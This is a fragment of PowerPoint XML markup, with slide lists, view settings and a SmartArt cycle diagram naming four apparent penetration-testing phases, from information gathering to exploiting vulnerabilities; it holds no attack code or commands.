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8"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="281" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="397" r:id="rId11"/>
    <p:sldId id="276" r:id="rId12"/>
    <p:sldId id="282" r:id="rId13"/>
    <p:sldId id="283" r:id="rId14"/>
    <p:sldId id="274" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="263" r:id="rId18"/>
    <p:sldId id="280" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="421" r:id="rId21"/>
    <p:sldId id="356" r:id="rId22"/>
    <p:sldId id="357" r:id="rId23"/>
    <p:sldId id="355" r:id="rId24"/>
    <p:sldId id="284" r:id="rId25"/>
    <p:sldId id="329" r:id="rId26"/>
    <p:sldId id="288" r:id="rId27"/>
    <p:sldId id="286" r:id="rId28"/>
    <p:sldId id="287" r:id="rId29"/>
    <p:sldId id="289" r:id="rId30"/>
    <p:sldId id="423" r:id="rId31"/>
    <p:sldId id="422"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12" r:id="rId50"/>
    <p:sldId id="307" r:id="rId51"/>
    <p:sldId id="308" r:id="rId52"/>
    <p:sldId id="309" r:id="rId53"/>
    <p:sldId id="310" r:id="rId54"/>
    <p:sldId id="311" r:id="rId55"/>
    <p:sldId id="361" r:id="rId56"/>
    <p:sldId id="313" r:id="rId57"/>
    <p:sldId id="314" r:id="rId58"/>
    <p:sldId id="315" r:id="rId59"/>
    <p:sldId id="320" r:id="rId60"/>
    <p:sldId id="321" r:id="rId61"/>
    <p:sldId id="322" r:id="rId62"/>
    <p:sldId id="323" r:id="rId63"/>
    <p:sldId id="358" r:id="rId64"/>
    <p:sldId id="324" r:id="rId65"/>
    <p:sldId id="325" r:id="rId66"/>
    <p:sldId id="316" r:id="rId67"/>
    <p:sldId id="317" r:id="rId68"/>
    <p:sldId id="318" r:id="rId69"/>
    <p:sldId id="319" r:id="rId70"/>
    <p:sldId id="326" r:id="rId71"/>
    <p:sldId id="327" r:id="rId72"/>
    <p:sldId id="328"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60" r:id="rId98"/>
    <p:sldId id="359" r:id="rId99"/>
    <p:sldId id="354" r:id="rId100"/>
    <p:sldId id="362" r:id="rId101"/>
    <p:sldId id="363" r:id="rId102"/>
    <p:sldId id="364" r:id="rId103"/>
    <p:sldId id="369" r:id="rId104"/>
    <p:sldId id="365" r:id="rId105"/>
    <p:sldId id="370" r:id="rId106"/>
    <p:sldId id="376" r:id="rId107"/>
    <p:sldId id="371" r:id="rId108"/>
    <p:sldId id="372" r:id="rId109"/>
    <p:sldId id="373" r:id="rId110"/>
    <p:sldId id="377" r:id="rId111"/>
    <p:sldId id="374" r:id="rId112"/>
    <p:sldId id="375" r:id="rId113"/>
    <p:sldId id="366" r:id="rId114"/>
    <p:sldId id="378" r:id="rId115"/>
    <p:sldId id="379" r:id="rId116"/>
    <p:sldId id="380" r:id="rId117"/>
    <p:sldId id="368" r:id="rId118"/>
    <p:sldId id="381" r:id="rId119"/>
    <p:sldId id="382" r:id="rId120"/>
    <p:sldId id="383" r:id="rId121"/>
    <p:sldId id="384" r:id="rId122"/>
    <p:sldId id="385" r:id="rId123"/>
    <p:sldId id="386" r:id="rId124"/>
    <p:sldId id="387" r:id="rId125"/>
    <p:sldId id="388" r:id="rId126"/>
    <p:sldId id="389" r:id="rId127"/>
    <p:sldId id="390" r:id="rId128"/>
    <p:sldId id="391" r:id="rId129"/>
    <p:sldId id="392" r:id="rId130"/>
    <p:sldId id="393" r:id="rId131"/>
    <p:sldId id="394" r:id="rId132"/>
    <p:sldId id="395" r:id="rId133"/>
    <p:sldId id="396" r:id="rId134"/>
    <p:sldId id="398" r:id="rId135"/>
    <p:sldId id="399" r:id="rId136"/>
    <p:sldId id="400" r:id="rId137"/>
    <p:sldId id="401" r:id="rId138"/>
    <p:sldId id="402" r:id="rId139"/>
    <p:sldId id="403" r:id="rId140"/>
    <p:sldId id="404" r:id="rId141"/>
    <p:sldId id="405" r:id="rId142"/>
    <p:sldId id="406" r:id="rId143"/>
    <p:sldId id="407" r:id="rId144"/>
    <p:sldId id="408" r:id="rId145"/>
    <p:sldId id="409" r:id="rId146"/>
    <p:sldId id="410" r:id="rId147"/>
    <p:sldId id="411" r:id="rId148"/>
    <p:sldId id="420" r:id="rId149"/>
    <p:sldId id="412" r:id="rId150"/>
    <p:sldId id="413" r:id="rId151"/>
    <p:sldId id="414" r:id="rId152"/>
    <p:sldId id="415" r:id="rId153"/>
    <p:sldId id="416" r:id="rId154"/>
    <p:sldId id="417" r:id="rId155"/>
    <p:sldId id="418" r:id="rId156"/>
    <p:sldId id="419" r:id="rId157"/>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50"/>
    <p:restoredTop sz="73244" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="106" d="100"/>
          <a:sy n="106" d="100"/>
        </p:scale>
        <p:origin x="480" y="184"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1800"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="103" d="100"/>
          <a:sy n="103" d="100"/>
        </p:scale>
        <p:origin x="-936"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8F67B3-51CB-4944-B1EF-EE12C354BB13}"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89B5DF13-5391-1542-987C-D6BA1F7F6F79}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Information Gathering</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E174431-169A-FC4F-841C-20C7A2B46E48}" type="parTrans" cxnId="{7DF0FBEC-914B-974F-B8BB-4F2A92BDA21E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}" type="sibTrans" cxnId="{7DF0FBEC-914B-974F-B8BB-4F2A92BDA21E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{096700AA-A667-4F41-AD04-3304C42905A5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Application Workflows</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F323898-3B1F-CC48-B4AB-0DAF9FAB03D6}" type="parTrans" cxnId="{1ACF42C1-F4C6-C84D-9A6D-CFE34A6727E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}" type="sibTrans" cxnId="{1ACF42C1-F4C6-C84D-9A6D-CFE34A6727E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4816F0BE-DEF1-3444-8454-1EBCE9A26A9C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Automated &amp; Manual Fuzzing/Scanning</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6208FB2-BF53-204C-BDB8-638D66896282}" type="parTrans" cxnId="{7E4D2E33-6888-BA42-BEF8-3D3026EB1E75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}" type="sibTrans" cxnId="{7E4D2E33-6888-BA42-BEF8-3D3026EB1E75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9822AF5E-EC40-8141-ABF1-FF6F08FBD5ED}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Exploiting Vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09366BEE-8727-D946-92BD-EE7E80DB5442}" type="parTrans" cxnId="{5BFA8480-8592-5941-91E2-0F78C036DEA8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}" type="sibTrans" cxnId="{5BFA8480-8592-5941-91E2-0F78C036DEA8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" type="pres">
      <dgm:prSet presAssocID="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" presName="cycle" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E71112B-BA1E-ED46-A7CF-C775A3B2EC2E}" type="pres">
      <dgm:prSet presAssocID="{89B5DF13-5391-1542-987C-D6BA1F7F6F79}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{070AB206-FD02-7640-AD17-5D60379E1FB1}" type="pres">
      <dgm:prSet presAssocID="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9D95D327-DF61-F849-82F4-709ED0851183}" type="pres">
      <dgm:prSet presAssocID="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5F7F994B-500C-C444-9F37-18CD18A1C9D2}" type="pres">
      <dgm:prSet presAssocID="{096700AA-A667-4F41-AD04-3304C42905A5}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F23CEF6E-F172-4847-A088-551C30395A5E}" type="pres">
      <dgm:prSet presAssocID="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B133B32-732B-B44E-9F74-11F574986D50}" type="pres">
      <dgm:prSet presAssocID="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9C04C3E1-4B42-8A49-863D-AF38B68542E9}" type="pres">
      <dgm:prSet presAssocID="{4816F0BE-DEF1-3444-8454-1EBCE9A26A9C}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CCCBDBDA-7692-8D4A-A4A8-731109EC5912}" type="pres">
      <dgm:prSet presAssocID="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87699C82-69FF-BB43-B2F3-0038560DEADB}" type="pres">
      <dgm:prSet presAssocID="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{79AFA3FB-0D00-FC4F-8759-DE72FEC7CA6E}" type="pres">
      <dgm:prSet presAssocID="{9822AF5E-EC40-8141-ABF1-FF6F08FBD5ED}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9C0795B-8145-9241-8DF2-C2A2F5E9F7A4}" type="pres">
      <dgm:prSet presAssocID="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7874D362-53F7-BA43-9BF5-A1597FBE5EF1}" type="pres">
      <dgm:prSet presAssocID="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2EC8E710-A3A4-F646-82A8-A29FB337BA63}" type="presOf" srcId="{4816F0BE-DEF1-3444-8454-1EBCE9A26A9C}" destId="{9C04C3E1-4B42-8A49-863D-AF38B68542E9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{AE324B2D-F4AF-8E44-ADBD-8EBFE19268E7}" type="presOf" srcId="{9822AF5E-EC40-8141-ABF1-FF6F08FBD5ED}" destId="{79AFA3FB-0D00-FC4F-8759-DE72FEC7CA6E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{7E4D2E33-6888-BA42-BEF8-3D3026EB1E75}" srcId="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" destId="{4816F0BE-DEF1-3444-8454-1EBCE9A26A9C}" srcOrd="2" destOrd="0" parTransId="{B6208FB2-BF53-204C-BDB8-638D66896282}" sibTransId="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}"/>
    <dgm:cxn modelId="{7E061F52-8330-1C48-81E1-52B6995159F5}" type="presOf" srcId="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}" destId="{070AB206-FD02-7640-AD17-5D60379E1FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{6E88E05F-1421-4B44-AA33-82C0B37FD11D}" type="presOf" srcId="{89B5DF13-5391-1542-987C-D6BA1F7F6F79}" destId="{1E71112B-BA1E-ED46-A7CF-C775A3B2EC2E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{28D39375-D15B-4F41-90FD-21BFB48940F5}" type="presOf" srcId="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}" destId="{F23CEF6E-F172-4847-A088-551C30395A5E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{C6626C77-E760-D043-A362-BF0A61781C8C}" type="presOf" srcId="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}" destId="{87699C82-69FF-BB43-B2F3-0038560DEADB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{5BFA8480-8592-5941-91E2-0F78C036DEA8}" srcId="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" destId="{9822AF5E-EC40-8141-ABF1-FF6F08FBD5ED}" srcOrd="3" destOrd="0" parTransId="{09366BEE-8727-D946-92BD-EE7E80DB5442}" sibTransId="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}"/>
    <dgm:cxn modelId="{8F3F6885-B60F-4940-8FD2-66E358D3A51E}" type="presOf" srcId="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" destId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{1ACF42C1-F4C6-C84D-9A6D-CFE34A6727E5}" srcId="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" destId="{096700AA-A667-4F41-AD04-3304C42905A5}" srcOrd="1" destOrd="0" parTransId="{2F323898-3B1F-CC48-B4AB-0DAF9FAB03D6}" sibTransId="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}"/>
    <dgm:cxn modelId="{DC3DD7D1-0C33-BD46-A333-A71FB6977EAD}" type="presOf" srcId="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}" destId="{9D95D327-DF61-F849-82F4-709ED0851183}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{0C2B62E1-A064-D249-ABE3-563D9E790F89}" type="presOf" srcId="{096700AA-A667-4F41-AD04-3304C42905A5}" destId="{5F7F994B-500C-C444-9F37-18CD18A1C9D2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{708012E7-3A9F-DB4E-9060-C33E582BFBC4}" type="presOf" srcId="{8431A860-2C88-044C-9ED1-8BAA4D3AE2BC}" destId="{5B133B32-732B-B44E-9F74-11F574986D50}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{7DF0FBEC-914B-974F-B8BB-4F2A92BDA21E}" srcId="{9B8F67B3-51CB-4944-B1EF-EE12C354BB13}" destId="{89B5DF13-5391-1542-987C-D6BA1F7F6F79}" srcOrd="0" destOrd="0" parTransId="{0E174431-169A-FC4F-841C-20C7A2B46E48}" sibTransId="{D0B239E4-20D7-C149-853F-FD0067F5FCE5}"/>
    <dgm:cxn modelId="{D17812F8-C0ED-6A45-941C-E68066EFF948}" type="presOf" srcId="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}" destId="{7874D362-53F7-BA43-9BF5-A1597FBE5EF1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{D7B670FC-19F8-2143-9EE6-BBB05EBD0D0B}" type="presOf" srcId="{AFA25454-4A7C-7B49-BEB1-F8E6E748E6B4}" destId="{CCCBDBDA-7692-8D4A-A4A8-731109EC5912}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{9BCCCCFE-9DE0-D642-AB4F-D3A60AB86241}" type="presOf" srcId="{3F20A5E0-3A05-2344-9820-5A88D0CD1BD2}" destId="{A9C0795B-8145-9241-8DF2-C2A2F5E9F7A4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{1E6DDAD4-ADA3-7640-BB72-A614F9AB926C}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{1E71112B-BA1E-ED46-A7CF-C775A3B2EC2E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{28F2D1F3-EE96-8442-914C-021C77EBFA49}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{070AB206-FD02-7640-AD17-5D60379E1FB1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{33902AE6-D763-C744-8C17-FBE84DF7EC42}" type="presParOf" srcId="{070AB206-FD02-7640-AD17-5D60379E1FB1}" destId="{9D95D327-DF61-F849-82F4-709ED0851183}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{93D8D5A3-D186-DA4B-8559-9AF29D6D093C}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{5F7F994B-500C-C444-9F37-18CD18A1C9D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{DBB51971-D678-BA45-9A0E-C5A84A8B8FAF}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{F23CEF6E-F172-4847-A088-551C30395A5E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{A22E957E-E99D-224D-BA54-4A250460F7B5}" type="presParOf" srcId="{F23CEF6E-F172-4847-A088-551C30395A5E}" destId="{5B133B32-732B-B44E-9F74-11F574986D50}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{125E5751-900A-9140-BCBA-1010E4EE9E62}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{9C04C3E1-4B42-8A49-863D-AF38B68542E9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{B22C2366-E806-2E43-94C0-18AF42C3E8E5}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{CCCBDBDA-7692-8D4A-A4A8-731109EC5912}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{342E6F7F-47A1-7E49-9EB0-C23D3F6A0DD9}" type="presParOf" srcId="{CCCBDBDA-7692-8D4A-A4A8-731109EC5912}" destId="{87699C82-69FF-BB43-B2F3-0038560DEADB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{C1CCDC11-D21A-5E41-BADA-F8EC854F291E}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{79AFA3FB-0D00-FC4F-8759-DE72FEC7CA6E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{F48F0B94-079D-8B41-9245-B339B92EE8DC}" type="presParOf" srcId="{B7E869EF-8534-8B49-BEFF-479D636DA5BD}" destId="{A9C0795B-8145-9241-8DF2-C2A2F5E9F7A4}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle2"/>
    <dgm:cxn modelId="{E125C8FA-2A4F-2B4C-B455-14EB8170DFE2}" type="presParOf" srcId="{A9C0795B-8145-9241-8DF2-C2A2F5E9F7A4}" destId="{7874D362-53F7-BA43-9BF5-A1597FBE5EF1}"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1112B-BA1E-ED46-A7CF-C775A3B2EC2E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3512046" y="1252"/>
          <a:ext cx="1205507" cy="1205507"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="90000"/>
                <a:alpha val="100000"/>
                <a:satMod val="200000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
          </a:path>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="42924"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Information Gathering</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3688588" y="177794"/>
        <a:ext cx="852423" cy="852423"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{070AB206-FD02-7640-AD17-5D60379E1FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2700000">
          <a:off x="4588344" y="1035041"/>
          <a:ext cx="321841" cy="406858"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="90000"/>
                <a:alpha val="100000"/>
                <a:satMod val="200000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
          </a:path>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="42924"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4602484" y="1082277"/>
        <a:ext cx="225289" cy="244114"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5F7F994B-500C-C444-9F37-18CD18A1C9D2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4793857" y="1283064"/>
          <a:ext cx="1205507" cy="1205507"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="90000"/>
                <a:alpha val="100000"/>
                <a:satMod val="200000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
          </a:path>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="42924"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Application Workflows</a:t>
          </a:r>
